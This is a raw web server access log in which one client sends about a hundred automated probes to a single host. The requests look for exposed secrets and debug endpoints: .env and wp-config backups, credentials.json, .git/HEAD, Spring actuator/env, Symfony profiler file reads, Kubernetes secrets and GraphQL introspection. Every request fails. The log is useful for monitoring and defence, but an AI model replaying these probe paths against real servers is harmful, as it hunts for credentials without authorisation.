192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:53 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v1/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:53 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v2/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/stripe" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:55 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/keys" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/payment/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/dashboard" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:57 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:57 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:58 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:59 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:59 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_ignition/health-check" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:59 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:19:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/horizon/api/stats" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:01 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:19:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/latest" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/open?file=.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_wdt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:07 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:14 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:19:21 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:19:22 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:19:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v1/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v2/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/stripe" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/keys" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/payment/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/dashboard" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_ignition/health-check" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/horizon/api/stats" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/latest" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/open?file=.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.60] [Length 22] [Gzip -] 